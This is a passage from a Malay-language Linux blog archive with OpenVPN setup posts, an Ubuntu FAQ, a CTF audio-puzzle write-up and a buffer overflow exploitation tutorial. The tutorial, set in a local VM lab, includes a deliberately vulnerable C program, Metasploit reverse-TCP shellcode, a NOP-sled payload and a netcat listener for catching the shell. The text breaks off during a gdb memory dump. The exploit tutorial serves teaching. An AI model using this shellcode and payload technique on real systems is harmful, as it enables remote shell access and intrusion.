::Sabily untuk Malaysia::

Pasang Sendiri OpenVPN: Persediaan Pelayan (kemaskini 3/1/2012)

2011-07-04T17:19:00.007+08:00

Salam sejahtera pengunjung budiman,

Dalam Bahagian 1, saya telah membincangkan mengenai definisi dan penjelasan mengenai apa itu VPN secara ringkas. Kali ini saya akan membawa anda ke penyediaan pelayan OpenVPN anda sendiri.

Tutorial kali ini akan menumpukan kepada penyediaan pelayan OpenVPN sebagai terowong (tunnel) yang membolehkan anda melepasi sekatan dan juga menegelakkan transaksi Internet anda dihidu (sniff) oleh orang lain.

Panduan membeli pelayan (server)

Mungkin anda tertanya-tanya bagaimana untuk membeli Virtual Private Server(VPS) ataupun Dedicated Server. Saya akan beri sedikit tips sekadar yang saya tahu untuk kegunaan OpenVPN.

Pastikan dalam terma dan syarat (ToS) penmbekal VPS anda memberi kebenaran untuk memasang VPN.
Pastikan TUN/TAP enabled pada VPS anda. Boleh hubungi Support Ticket pembekal anda untuk maklumat lanjut.
Kalau VPS anda berasaskan OpenVZ, minta hosting anda untuk menghidupkan "iptables_nat" pada VPS/container anda.
Pastikan harga mengikut bajet poket anda
Mahukan cadangan saya? Kalau mampu beli dari santrex.net. Kalau jenis bajet rendah macam saya, saya beli dari sahabat saya di sini.
Tambahan info: Pastikan waktu pelayan anda dan waktu komputer anda diselaraskan dengan pelayan waktu(time server) seperti time.nasa.gov Anda boleh gunakan arahan
sudo ntpdate time.nasa.gov
di komputer anda dan meminta penyedia perkhidmatan pelayan anda untuk menyelaraskan waktu di server anda juga.

Selepas membeli VPS/Dedicated server anda sendiri. Seterusnya, kita perlu memasang sistem pengendali (OS) di server.Saya memilih Ubuntu 10.04 LTS Server Edition untuk sistem pengendali pelayan (server) saya. Tutorial ini akan fokus kepada pemasangan openvpn server di Ubuntu 10.04 LTS Server Edition.

Pemasangan OpenVPN

Periksa dulu sama ada TUN/TAP sudah diupayakan (enabled) atau belum dengan arahan (command).

cat /dev/net/tun

Anda sepatutnya akan mendapat keputusan seperti ini.

cat: /dev/net/tun: File descriptor in bad state

Jikalau anda mendapat ralat (error) seperti ini.

cat: /dev/net/tun: No such device

Anda perlu menghubungi pembekal VPS anda untuk mengupayakan (enable) TUN/TAP di VPS anda.

Sekarang bolehlah kita teruskan dengan memasang openvpn,openssl,dnsmasq, dan juga iptables-persistent
di pelayan.

sudo apt-get install openvpn openssl dnsmasq iptables-persistent

Selepas melaksanakan arahan di atas. Laksanakan arahan berikut untuk menduplikasi sample config openvpn ke direktori /etc/openvpn/easy-rsa

mkdir /etc/openvpn/easy-rsa

cd /usr/share/doc/openvpn/examples/easy-rsa/2.0/

cp -R * /etc/openvpn/easy-rsa

cd /etc/openvpn/easy-rsa

Bersambung...

Rujukan:

OpenVPN server ubuntu guide

IPTables HowTo - Community Ubuntu Documentation

OpenVPN on Ubuntu 10.04 LTS - Ubuntu Help

openvpn setup guide by dimenxion for Debian 6.x

Pasang Sendiri OpenVPN: Pengenalan kepada VPN

2011-02-16T16:29:00.005+08:00

Assalamualaikum dan salam sejahtera,

Sudah lama saya tidak membuat sebarang pos baru di blog ini. Kali ini saya akan kongsikan mengenai Virtual Private Network (VPN) , OpenVPN, cara pemasangan pada Virtual Private Server/ komputer sendiri, dan masalah2 berbangkit.

Saya akan jadikan tutorial ini dalam bersiri untuk memudahkan kefahaman anda. Untuk siri pertama ini saya jadikan sebagai mukaddimah atau intro kepada VPN secara umum. Harap-harap siri ini tidak menjadi terbengkalai seperti siri Silat SQL.

Apakah itu VPN?

Menurut Wikipedia,

Rangkaian persendirian maya(virtual private network, VPN) ialah sebuah rangkaian yang menggunakan insfrastruktur telekomunikasi awam, seperti Internet, untuk membekalkan pejabat-pejabat jarak jauh atau pengguna persendirian dengan capaian selamat terhadap rangkaian organisasi mereka. Tujuannya adalah untuk mengelakkan sistem talian bermilik atau berpajak yang mahal tetapi boleh digunakan untuk satu organisasi sahaja. Matlamat VPN adalah untuk membekalkan organisasi terbabit dengan kebolehan selamat yang sama tapi dengan kos yang lebih rendah.

Ia mengkapsulkan pindahan data antara dua atau lebih peranti rangkaian yang tidak berada pada rangkaian persendirian yang sama dengan tujuan supaya data yang dipindahkan kekal sulit daripada peranti-peranti lain pada satu atau lebih rangkaian kawasan setempat atau luas yang berselang.

Ok, ayat wikipedia susah nak faham ? Tak mengapa, saya cuba jelaskan dalam gaya bahasa yang mudah. Pernah guna LAN? kita tak boleh akses dari luar. Bagaimana nak akses dari luar? di sinilah gunanya VPN sebagai pengantara antara rangkaian luar seperti Internet. Dengan VPN, sesebuah organisasi boleh mencapai keselamatan seperti menggunakan dedicated line. Pengguna boleh menggunakan talian internet sendiri di rumah untuk menyambung ke rangkaian pejabat.

Antara aplikasi VPN ini seperti mesin2 ATM yang menyambung ke rangkaian bank pusat seolah-olah mesin2 ATM ini ada di dalam rangkaian yang sama. Penyulitan (Encryption) yang ketat yang digunakan dalam VPN menyukarkan penceroboh/penggodam menghidu paket trafik ATM2 ini.

VPN juga digunakan sebagai terowong (tunnel) untuk melepasi sekatan di tembok api (firewall) di pejabat,kolej, atau universiti. Dengan melencongkan semua trafik ke port yang biasa dibuka seperti HTTPS(port 443). Disebabkan trafik ini disulitkan (encrypted), sistem pemantaun trafik tidak dapat mengesan trafik sebenar yang berlaku di antara pengguna dan pelayan VPN.

Bersambung...

Pengumuman mengenai Silat SQL

2011-02-16T15:55:00.001+08:00

Assalamualaikum dan selamat sejahtera,

Silat SQL akan ditulis semula(rewritten) dengan menambahkan intro kepada pangkalan data(database) dan Bahasa Pertanyaan Berstruktur(SQL) itu sendiri. Saya tak nak ia sekadar dijadikan rujukan untuk "hacker wannabe" semata-mata yang kabur mengenai proses,konsep dan teori suntikan SQL. Yang tak tahu SQL atau database tu apa pun ada. Sekadar gunakan tools/perisian tertentu semata2, nak mengaku penggodam terhebat di alam maya. Sigh...

Pakai tools tiada masalah selagi kita faham konsep dan manfaatkan tools untuk belajar kaedah serangan yang kita mungkin tak tahu dengan kejuruteraan terbalik (reverse engineering) tools tersebut. Atau pantau dengan perisian pemantau rangkaian seperti Wireshark mungkin? :D Hayati kata2 hikmah di bawah ini.

The best offense is defense.

Siri ini akan fokus kepada serangan dan pertahanan untuk MySQL sahaja. Kalau ada pertanyaan/komen/cadangan, anda digalakkan untuk komen di bawah. Saya galakkan untuk tulis ayat penuh dan elakkan gaya bahasa SMS. Manfaatkan papan kekunci anda sebaiknya. Terima Kasih. Artikel mengenai VPN dan OpenVPN akan meyusul.

Sabily Al-Quds 10.10 dilancarkan

2010-11-06T16:50:00.000+08:00

Assalamualaikum dan salam sejahtera semua,

Sekadar ingin memaklumkan Sabily Al-Quds atau Sabily 10.10 sudah boleh dimuat turun melalui link di bawah

http://88.191.122.107/sabily/10.10/

Maaf kerana sudah lama tak pos apa-apa artikel terbaru dek kesibukan yang teramat sangat. Doakan saya supaya dapat menyelesaikannya seberapa segera untuk membolehkan saya pos beberapa artikel yang tertunggak di blog ini.

Wassalam,

-ak47suk1-

P/S: Kena pertimbangkan tukar banner blog ni sebab Sabily dah tukar logo baru.
P/P/S: Kalau anda ada idea untuk tajuk-tajuk yang menarik untuk pos saya akan datang, boleh beritahu dalam komen :D

Soalan yang kerap ditanya mengenai Ubuntu/Sabily (Kemaskini 17/11/2011)

2010-08-30T12:58:00.014+08:00

# Ada e-book atau manual yg mudah untuk cara2 install Ubuntu?

Manual Ubuntu_web.pdf oleh saudara MelayUbuntu

mirror1

mirror2

# Macam mana saya nak tahu senarai kad yang ada dalam pc saya? Kenapa wireless card/ bluetooth/webcam Ubuntu saya tak detect? Kenapa peranti USB saya x detect?

sebelum menanyakan soalan ini, diharap saudara/i sekalian boleh buka Terminal (Pergi ke Applications > Accessories >Terminal)

Taip arahan berikut

lspci

untuk senarai kad pci pada pc anda

lsusb

untuk senarai peranti usb

Contoh hasil output dua arahan ini serentak

Kemudian setelah anda tahu jenis kad/model untuk pc anda. Anda boleh google dengan keyword berikut

site:ubuntuforums.org

Contoh:

site:ubuntuforums.org huawei e1550 cannot connect to internet

Kalau penjelasan forum ubuntu itu kurang jelas untuk anda, anda boleh rujuk di forum JomLinux, forum Ubuntu Malaysia, forum TBD.my, Discussion page Melayubuntu, dan forum2 lain. Tidak lupa juga Discussion di Page Sabily Untuk Malaysia

# Saya pengguna netbook, bagaimana untuk saya install ubuntu tanpa CD?

Sekiranya anda pengguna Windows:

Guna UNetBootin.

Sekiranya anda ada PC yg sudah dipasang dengan Ubuntu.

Guna System > Administration > Startup Disk Creator

# Ada beberapa harware pc saya Ubuntu tak detect.

Pergi ke System > Administration > Hardware Drivers. tunggu sekejap. Klik activate selepas pilih mengikut perkakasan pc anda.

# Mobile broadband saya ( Huawei XXXX) tak boleh connect internet

Setahu saya celcom manager tak ade versi Linux. Utk connect ke celcom saudara boleh guna dua cara, Network Manager atau wvdial. Untuk gunakan network manager, saudara perlu upgrade ubuntu saudara dengan LAN atau wifi terlebih dahulu sebab utk lucid lynx yg belum upgrade. x de driver utk huawei.

untuk wvdial, saudara boleh rujuk tulisan saya di http://mysabily.blogspot.com/2010/06/tutorial-guna-huawei-e1550-menggunakan.html

# Modem CSL saya tak boleh connect ke internet.

http://syahrilhafiz.com/blog/2010/06/14/cara-sambung-internet-guna-csl-3-5g/

# Kalau nak install semua benda yg biasanya pengguna komputer akan pakai, install ubuntu restricted extras.

Ada 2 cara.

Paling Mudah, pergi ke Applications > Ubuntu Software Center.

search "extras"

Nanti korang akan jumpa pakej "Ubuntu Restricted Extras". Install

lagi satu guna CLI

sudo apt-get install ubuntu-restricted-extras.

# tak boleh update, gagal dapatkan pakej repo

Tukar source repo kat Administration > Software Sources. Kat "Download from:" pilih Other... > Malaysia > archive.mmu.edu.my atau mirror.upm.edu.my

# saya nak tanya, kalau ubuntu 'hang' nak buat macam mana ek? bila jadi camni terpaksa reset pc.. ada cara lain ker? kalau window leh g ke task manager

Right Alt + PrtSc + K

atau

Ctrl + Alt + Backspace

# Pasang sambungan jalur lebar mudah alih dengan menggunakan NetworkManager di Ubuntu

huawei e1550 patut dah auto detect dengan NetworkManager. Cucuk je boleh pakai klik kanan kat ikon NetworkManager patut ada Enable Mobile Broadband.

Kalau ada, klik Edit Connections...

Pergi tab Mobile Broadband

Klik add,

Patut dah nampak Huawei Mobile tu

tekan Forward,

Pilih Malaysia,

Pilih Celcom,

Ok, kat plan ni mungkin ada perubahan. Kalau guna Celcom 3g kena tukar ke 3g.celcom.net.my. Atau cuba guna, default celcom.net.my. Kena rujuk Celcom sendiri untuk APN sebab rasa saya yg baru dah tukar. Kali terakhir saya pakai Celcom 3g.

Klik Apply.

Isi detail username,password (rujuk panduan celcom) dan PIN sim card.

Klik Ok.

Pilihan Celcom broadband ada kat dalam list. klik je. Kalau takde apa2 masalah, dapat connect seperti biasa.

#

Sesiapa ada masalah nak pasang Ubuntu pada Acer Aspire M1641 Desktop, alhamduliLLah ini penyelesaiannya:

. Go to BIOS settings by pressing DEL while the system is booting
. On the BIOS menu go to ADVANCED tab
. On the ADVANCED menu screen go to INSTALLER OS SELECT
....... Under Installer OS Select there is WIndows by default
. Hit Enter and change it to OTHERS
. Hit F10 tey to save new settings and exit BIOS setup

sekadar berkongsi satu solusi...

# sy ada mslh dgn ubuntu... sy terpadam icon sound,wireless n berkaitan dgn sistem mcm mane nk wujud kembali....

klik kanan pada ruang kosong panel

pilih "Add to Panel"

Dwi-klik Indicator Panel
...
Harap penjelasan saya membantu.

# salam
nak tanya skit ni..
kenapa tiba2 ubuntu 10.04 saya ni ada masalah dengan keyboard?
saya kena tekan huruf tu kat keyboard tu 2-3 saat, baru muncul kat screen.

semak di sticky key, slow key dengan bounce key settings di keyboard prefrences.

# salam..nak tnye berkaitn dgn masalah yg same mcm ni ---> http://askubuntu.com/questions/36196/theme-changed-by-itself .. saya da google..tapi x tahu mane satu solution yg betol..harap2 ade yg boleh tolong bntu dn jelaskn :D terima kasih :D

ni may help http://askubuntu.com/questions/21305/desktop-forgets-theme/21324#21324

# Sape tau mcmne nak kasi lajukan speed utk IE kat ubuntu nie...aku kena pakai IE utk keje kat opis...tp dianyer speed slow...x mcm firefox...kalu bleh aku x yah laa pakai windows lg kat opis

lepas aku run rm -rfv ~/.wine dgn winecfg...mcm dah ok speed dia...speed dah sama mcm aku run kat windows...yeay

Pos ini akan dikemaskini dari masa ke semasa. Anda juga boleh melihat kandungan pos ini di Ubuntu Malaysia LoCo Team dan di halaman Sabily Untuk Malaysia

I-hack 2010: GerakKerja HnD Puzzle kena_sound.wav

2010-08-10T16:47:00.007+08:00

Download puzzle dari sini

http://dl.dropbox.com/u/4707680/puzzlesengal.7z

MD5: bc87727e049f92262b7d89c808f8f80d

Tools yang diperlukan ( saya guna Ubuntu, jadi saya ambil je yang perlu dari repo). Untuk distro lain, sila guna package manager masing2 :)

Audacity - Editor untuk audio

Multimon - Untuk analisa tone DTMF dan lain2 encoder ~~utk telefon~~ transmisi radio.

Cara install:

Buka Terminal taip

sudo apt-get install audacity multimon

Kalau anda semua mainkan pada pemain audio pc. Anda akan dengar ton DTMF atau dial telefon. Audacity ada generator untuk DTMF tone. Tapi kalau nak decode macam mana pulak?

Di sinilah gunanya multimon.

di Terminal anda taip

man multimon

Dari sini kita boleh baca dokumentasi untuk multimon. Tengok perenggan berikut betul2.

EXAMPLE
Decode signal modulations from a sound file /tmp/message.wav without using a SCOPE display:
multimon -s SCOPE -t wav /tmp/message.wav

nak exit dari manual taip ":q"

kita gunakan arahan berikut:

multimon -s SCOPE -t wav kena_sound.wav

Lihat screenshot di bawah

Nampaknya ada masalah di sini. takkan ffffff tu pulak kan? Cuba kita buka fail tersebut dengan audacity

Buang noise

Buang lagi

Buang kesemuanya

Simpan sebagai apa2 nama yg anda suka

Tekan ok je

Selesai

P/S : Real man don't know antivirus but real man know multimon :D
PP/S: This is NOT A SOLUTION. This is just what I do to get it. There are many ways to get the answer. But, just getting the final answer ONLY does not help you to understand. Go learn yourself the CONCEPT of DTMF instead of just going to get the final answer for this puzzle.

Tutorial Eksploitasi Buffer Overflow Termudah untuk Difahami

2010-06-27T21:41:00.008+08:00

(English version of this tutorial will be available soon on kaibathelegacy.blogspot.com)

Penyediaan Box yang Bocor

Bahan-bahannya:

• Ubuntu Lucid Lynx (atau yg lebih lama lagi baik) di dalam VirtualBox atau VMWare. Tak perlu update. Buang perisian yg tak berkenaan jika suka untuk mengurangkan saiz Virtual Machine.

• Install Metasploit pada PC anda (bukan VM, diperlukan untuk generate reverse shell). Muat Turun dari http://www.metasploit.com bersesuaian dengan OS yang menjadi host untuk VM Ubuntu/ Box yang Bocor ini.

• Sekiranya anda Pengguna Windows, pastikan anda sudah ada netcat.exe untuk terima shell dari mangsa (Box yang Bocor). Pengguna distro linux, netcat sudah sedia ada.

Kafiat untuk bermula:

Buka Terminal di Box yang bocor,

anda taip

cat /proc/sys/kernel/randomize_va_space

Pastikan nilainya 0. Sekiranya bukan. Taip

sudo /sbin/sysctl -w kernel.randomize_va_space=0

Periksa nilai randomize_va_space semula.

cat /proc/sys/kernel/randomize_va_space

Contoh Kod yang ada Buffer Overflow

/* Save Kod sebagai mangkuk.c * Nak mudah save di Desktop*Copy kod dari sini*/
#include <stdlib.h>

#include <stdio.h>

#include <string.h>

int bof(char *string) {

char buffer[1024];

strcpy(buffer, string);

return 1;
}

int main(int argc, char *argv[]) {

bof(argv[1]);
printf("Done..\n");

return 1;
}
/*Sampai la sini*/

Di terminal anda tadi, ikuti langkah berikut.

cd ~/

cd Desktop/

ls -al

Contoh:

saifool@saifool-laptop:~/Desktop$ cd ~/
saifool@saifool-laptop:~$ cd Desktop/
saifool@saifool-laptop:~/Desktop$ ls -al
total 104
drwxr-xr-x 2 saifool saifool 4096 2010-06-25 23:28 .
drwxr-xr-x 25 saifool saifool 4096 2010-06-25 23:23 ..
-rwxr-xr-x 1 saifool saifool 8484 2010-06-24 23:31 bufvulcode
-rw-r--r-- 1 saifool saifool 478 2010-06-24 23:30 bufvulcode.c
-rwxr-xr-x 1 saifool saifool 8811 2010-06-24 23:36 eggcode
-rw-r--r-- 1 saifool saifool 922 2010-06-24 23:35 eggcode.c
-rwxr-xr-x 1 saifool saifool 8297 2010-06-24 23:38 findeggaddr
-rw-r--r-- 1 saifool saifool 129 2010-06-24 23:36 findeggaddr.c
-rwxr-xr-x 1 saifool saifool 550 2010-06-24 21:06 gedit.desktop
-rwxr-xr-x 1 saifool saifool 476 2010-06-24 21:04 gnome-terminal.desktop
-rwxr-xr-x 1 saifool saifool 8611 2010-06-25 21:36 mangkuk
-rw-r--r-- 1 saifool saifool 245 2010-06-24 21:07 mangkuk.c
-rw-r--r-- 1 saifool saifool 3886 2010-06-25 21:56 shellz
-rw-r--r-- 1 saifool saifool 2149 2010-06-25 23:23 shellz2
-rwxr-xr-x 1 root root 9898 2010-06-25 22:55 smashme2
-rw-r--r-- 1 saifool saifool 301 2010-06-25 22:54 smashme2.c
saifool@saifool-laptop:~/Desktop$

Sekarang masa untuk compile code C, mangkuk,c tadi. Kita tak boleh compile kod tersebut cara biasa. Kita kena matikan fungsi StackGuard dlm gcc dan membenarkan execstack.

Contoh:

saifool@saifool-laptop:~/Desktop$ gcc -ggdb -fno-stack-protector -z execstack mangkuk.c -o mangkuk

saifool@saifool-laptop:~/Desktop$ ./mangkuk
Segmentation fault

saifool@saifool-laptop:~/Desktop$ ./mangkuk `perl -e 'print "A"x1000'`
Done..
saifool@saifool-laptop:~/Desktop$ ./mangkuk `perl -e 'print "A"x1024'`
Done..
saifool@saifool-laptop:~/Desktop$ ./mangkuk `perl -e 'print "A"x1200'`
Segmentation fault
saifool@saifool-laptop:~/Desktop$

Apa yang dimaksudkan dengan perintah ./mangkuk `perl -e 'print "A"x1000'` tu? Perintah ini sama dengan A sebanyak 1000 kali sebagai input untuk program mangkuk ini. Untuk mengenal konsep buffer overflow ni dengan lebih mendalam, sila baca rujukan tambahan di bawah artikel ini. Sebab saya lebih fokus untuk mereka yang ingin hands-on dalam memahami buffer overflow ini. Saya cuma akan terangkan secara ringkas sahaja.

Kita lihat kod mangkuk.c tadi.

char buffer[1024];

Saiz buffer yang diperuntukkan ialah 1024 bytes. Tapi tak semestinya bila kita input 1025 bytes, terus ada segmentation fault; salah satu dari tanda-tanda buffer overflow. Kita akan gunakan teknik 'direct jump'. Macam mana nak cari segmentation fault yang benar2 berguna?

Terlebih dahulu, kita akan berkenalan dengan GDB. Di Terminal, taip
gdb mangkuk

Out put seperti di bawah

saifool@saifool-laptop:~/Desktop$ gdb mangkuk
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /home/saifool/Desktop/mangkuk...done.
(gdb)

Di GDB ni, kita boleh lihat struktur dalaman mana2 program yg telah dikompil.

Sila tulis arahan berikut di gdb.

set disassembly-flavor intel

disass main

Contoh output

(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x08048439 <+0>: push ebp
0x0804843a <+1>: mov ebp,esp
0x0804843c <+3>: and esp,0xfffffff0
0x0804843f <+6>: sub esp,0x10
0x08048442 <+9>: mov eax,DWORD PTR [ebp+0xc]
0x08048445 <+12>: add eax,0x4
0x08048448 <+15>: mov eax,DWORD PTR [eax]
0x0804844a <+17>: mov DWORD PTR [esp],eax
0x0804844d <+20>: call 0x8048414
0x08048452 <+25>: mov DWORD PTR [esp],0x8048530
0x08048459 <+32>: call 0x8048350
0x0804845e <+37>: mov eax,0x1
0x08048463 <+42>: leave
0x08048464 <+43>: ret
End of assembler dump.

Anda nampak 0x0804843f <+6>: sub esp,0x10 . 10 dalam asas nombor 16 (HEX) ialah 16 dalam asas nombor 10 (DEC). Maknanya, memori memperuntukkan 1024 (dah declare pada buffer) dan ditambah dengan 16 menjadikan saiz buffer 1040. Walaupun segmentation fault mungkin berlaku, kita tidak dapat mengeksploitasi bug ini dengan baik.

Untuk lebih memudahkan anda semua memahami konsep eksploitasi buffer overflow ini, Sekarang di gdb taip arahan berikut

run `perl -e 'print "A"x1025'`
run `perl -e 'print "A"x1029'`
run `perl -e 'print "A"x1038'`
run `perl -e 'print "A"x1040'`

Contoh Output:

(gdb) run `perl -e 'print "A"x1025'`
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1025'`
Done..

Program exited with code 01.
(gdb) run `perl -e 'print "A"x1029'`
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1029'`
Done..

Program exited with code 01.
(gdb) run `perl -e 'print "A"x1038'`
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1038'`

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb) run `perl -e 'print "A"x1040'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1040'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

" Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? "

ini bermaksud EIP (Extended Instruction Pointer) adalah pada 0x41414141 yang tidak wujud. Sebab itu ada ralat. Kita perlu gantikan dengan alamat yg wujud di mana pada alamat itu kita akan letak shellcode iaitu sebuah reverse shell yg membolehkan kita mengakses terminal Box yang Bocor dari host kita.

Persediaan Shellcode

Anda sudah memasang Metasploit pada host anda? Jika sudah. Sila Buka Terminal dan taip

msfweb
Tunggu seketika sehingga output seperti ini keluar

ak47suk1@ak47suk1-laptop:~/Desktop$ msfweb
[*] Warning: As of Metasploit 3.3 this interface is no longer supported:
Please see https://metasploit.com/redmine/issues/502

[*] Starting msfweb v3.4.1-dev on http://127.0.0.1:55555/

config.gem: Unpacked gem rack-1.0.1 in vendor/gems has no specification file. Run 'rake gems:refresh_specs' to fix this.
=> Booting WEBrick
=> Rails 2.3.5 application starting on http://127.0.0.1:55555
[*] Initializing the Metasploit Framework...
[*] Initialized the Metasploit Framework
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2010-06-27 20:18:55] INFO WEBrick 1.3.1
[2010-06-27 20:18:55] INFO ruby 1.9.1 (2009-07-16) [x86_64-linux]
[2010-06-27 20:18:55] INFO WEBrick::HTTPServer#start: pid=23567 port=55555

Sekarang buka firefox,chrome atau mana2 browser pilihan anda. Lawati http://localhost:55555

Pilih Payloads.

Cari "x86" pada textbox. Pilih Linux Command Shell, Reverse TCP Inline.

Ada input yang perlu anda masukkan.

LHOST (ip local host anda, sebagai contoh local ip saya): 192.168.1.2

LPORT (port listening netcat anda, ikut je contoh saya): 12345

Max size: 96

Kemudian , klik Generate.

Anda akan nampak output seperti ini

/*
* linux/x86/shell_reverse_tcp - 96 bytes
* http://www.metasploit.com
* Encoder: generic/none
* NOP gen: x86/single_byte
* LHOST=192.168.1.2, LPORT=12345, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false, InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52"
"\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53"
"\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8"
"\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43"
"\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

shellcode anda mungkin berbeza disebabkan perbezaan local ip atau yg lain. Sekarang kita perlu ubah ini

"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52"
"\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53"
"\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8"
"\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43"
"\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

menjadi seperti ini

\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

Sekarang untuk percubaan mengeksploitasi bug ini, kita akan gunakan konsep berikut.

[ A x 600] [NOP x340] [Shellcode 96] [BBBB] = 1040

Ok di dalam gdb, taip arahan berikut:

run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Contoh Output:

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

Cantekkk. 0x42424242 yg bersamaan dengan "BBBB" betul2 berada di EIP yang kita boleh letak address yang menghala ke shellcode kita.

Sebelum itu di host anda (bukan Box yang Bocor), taip
nc -l 12345 -vv

Sekiranya tidak berjaya/error netcat

nc -l -p 12345 -vv

Command netcat ini digunakan untuk menerima shell dari Box yang bocor.

Kembali semula ke Box yang bocor, di gdb, taip
(gdb) x/2000xb $esp

Tekan Enter sampai selesai.

Contoh Output:
..dipotong....
0xbffff468: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff470: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff478: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff480: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff488: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff490: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff498: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4b8: 0x41 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4c0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
